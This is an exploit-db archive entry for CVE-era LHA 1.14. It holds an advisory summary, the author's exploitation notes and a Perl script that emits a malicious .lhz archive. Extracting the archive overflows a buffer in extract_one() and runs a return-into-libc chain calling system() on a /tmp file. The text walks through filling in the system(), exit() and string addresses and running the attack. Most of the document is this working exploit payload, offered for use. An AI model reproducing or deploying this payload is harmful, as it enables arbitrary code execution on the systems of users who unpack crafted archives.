exploit-db-mirror/platforms/linux/remote/24120.c

source: http://www.securityfocus.com/bid/10354/info
LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' function and are due to a failure of the application to properly validate string lengths in offending files.
These issues might allow an attacker to execute code in the context of a user invoking the affected utility.
Exploiting lha-1.14 (after security advisories)
19 May, 2004
Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl>
At the time of writing this text, some vulnerabilities have been discovered
and fixed, but not all (I've sent information to major Linux distributions and
Bugtraq, but they didn't seem to bother).
This code creates an archive which, when decompressed with lha-1.14,
will cause a buffer overflow. The bug is in the function extract_one (there are a
lot of bugs, actually). At first it looked like a typical stack overflow,
but after a couple of thoughts it was obvious that returning onto the stack was
impossible (due to special 0xff handling). The only option that came to my mind
was return-into-libc.
The addresses inside this code make the overwritten return chain call system("/tmp/lhXXXXXX") and exit().
Before exploiting 3 addresses have to be obtained:
- system function,
- exit function (not strictly needed, but without it a SEGFAULT could be noticed),
- address of /tmp/lhXXXXXX inside the exploited binary.
Put these addresses into their place in the code (in little-endian byte order
on x86) and run:
./code > archive.lhz
then the command
lha -e archive.lhz
will cause execution of /tmp/lhXXXXXX
Enjoy
---CODE START---
#!/usr/bin/perl
# Writes a crafted LHA archive to STDOUT (the accompanying text runs it as
# "./code > archive.lhz"). Per that text, extracting the archive with
# lha-1.14 overflows a buffer in extract_one() because header string lengths
# are not validated, and the overwritten return address is redirected into
# libc (return-into-libc) rather than onto the stack. The fix is on the
# consumer side: a release of lha whose extract_one() bounds-checks header
# string fields.
#
# The three addresses below are specific to one build of lha and its libc
# and are meant to be replaced per target; each is a 4-byte x86
# little-endian value.
my $exit_addr= "\x50\xf2\x4\x40";   # address of exit()
my $system_addr= "\x30\x65\x6\x40"; # address of system()
my $tmp_string= "\xfa\x1e\x5\x8";   # address of the "/tmp/lhXXXXXX" string inside the lha binary
# Archive body, emitted verbatim. It consists of several headers carrying
# the "-lhd-" method marker (\x2d\x6c\x68\x64\x2d) followed by long runs of
# 0x41; presumably these fill the unchecked string fields - confirm against
# extract_one() in lha-1.14. The exact byte sequence matters, so the string
# is kept as a single literal.
print "\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5".
"\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0".
"\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde".
"\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20".
"\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2".
"\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68".
"\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0".
"\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d".
"\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0".
"\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
"\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48".
"\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50".
"\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68".
"\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0".
"\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0".
"\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\xff\x41\x41\x41\x41".
# The target-specific address triple is spliced in here, in the order the
# return-into-libc chain consumes it: system(), then exit(), then the
# pointer to "/tmp/lhXXXXXX" that system() receives as its argument.
$system_addr. $exit_addr. $tmp_string.
"\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0";
---CODE END---